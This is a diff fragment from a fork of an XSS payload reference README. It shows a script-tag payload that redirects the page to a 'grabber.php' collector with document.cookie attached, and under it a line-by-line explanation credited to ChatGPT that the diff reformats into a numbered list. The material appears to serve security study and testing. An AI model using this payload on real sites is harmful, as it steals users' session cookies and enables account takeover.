the-valluvarsploit/PayloadsAllTheThings/XSS Injection/README.md

 <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
 ```
 **ChatGPT Explationation:**
-This JavaScript code uses the document.location property to redirect the current page to a new URL, which is constructed by concatenating the string 'http://localhost/XSS/grabber.php?c=' with the document.cookie property.
-The document.cookie property is a string containing all the cookies for the current page.
-The resulting URL will look something like this: "http://localhost/XSS/grabber.php?c=session_id=abcdef; user_id=123456".
-The page is then redirect to this URL which will trigger a GET request to the specified address 'http://localhost/XSS/grabber.php' and passing the cookies as a query parameter 'c' .
-The script is sending all the cookies of the current website to a PHP script located on localhost, this script 'grabber.php' can be controlled by the attacker which can be used to steal the cookies and potentially gain unauthorized access to the user's account.
+1. This JavaScript code uses the document.location property to redirect the current page to a new URL, which is constructed by concatenating the string 'http://localhost/XSS/grabber.php?c=' with the document.cookie property.
+2. The document.cookie property is a string containing all the cookies for the current page.
+3. The resulting URL will look something like this: "http://localhost/XSS/grabber.php?c=session_id=abcdef; user_id=123456".
+4. The page is then redirect to this URL which will trigger a GET request to the specified address 'http://localhost/XSS/grabber.php' and passing the cookies as a query parameter 'c'.
+5. The script is sending all the cookies of the current website to a PHP script located on localhost, this script 'grabber.php' can be controlled by the attacker which can be used to steal the cookies and potentially gain unauthorized access to the user's account.

 ```html